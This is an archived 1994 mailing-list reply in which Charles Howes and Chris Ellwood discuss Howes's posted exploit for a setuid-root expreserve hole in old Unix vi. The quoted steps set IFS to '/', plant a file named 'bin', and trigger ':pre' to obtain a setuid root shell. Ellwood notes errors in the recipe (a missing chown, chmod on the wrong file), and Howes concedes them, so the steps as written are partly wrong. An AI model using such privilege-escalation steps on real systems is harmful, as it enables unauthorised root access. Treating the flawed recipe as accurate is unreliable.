Re: chmod 000 .rhosts - works?

Charles Howes (chowes@helix.net)
Mon, 17 Oct 1994 02:46:30 -0700 (PDT)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Steve Davis: "Re: Internet Worm"
Previous message: Gene Spafford: "Re: Internet worm source code"
In reply to: Chris Ellwood: "Re: chmod 000 .rhosts - works?"
Next in thread: Peter Wemm: "Re: chmod 000 .rhosts - works?"

On Sun, 16 Oct 1994, Chris Ellwood wrote:

> Charles Howes said...
> > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
> >   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
> >   with 'system()'.  So, do the following:
> >     % cd /tmp
> >     % cp /bin/sh fubar
> >     % cat > bin
> >     chmod 4755 fubar
> >     ^D
> >     % chmod u+x fubar
> 
> I see a couple problems with the script so far.  /bin/sh was copied
> to fubar while you are a regular user, so it will be owned by you
> and you'll end up with a nice copy of /bin/sh that's setuid to you,
> not your target user.  Also, that last line should probably read 
> 'chmod u+x bin', not fubar.

Ooops, forgot the chown.  Sigh.  Trust memory to lose things.

> >     % setenv IFS=/
> >     % vi
> >     :pre
> >     :q
> >     % fubar
> >     #
> >   Some versions of expreserve don't have the hole.
> >   Some versions of vi don't have the :pre command.
> >   One does not imply the other.
> 
> Thanks for posting it anyway.
> 
> - Chris
> 

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

Next message: Steve Davis: "Re: Internet Worm"
Previous message: Gene Spafford: "Re: Internet worm source code"
In reply to: Chris Ellwood: "Re: chmod 000 .rhosts - works?"
Next in thread: Peter Wemm: "Re: chmod 000 .rhosts - works?"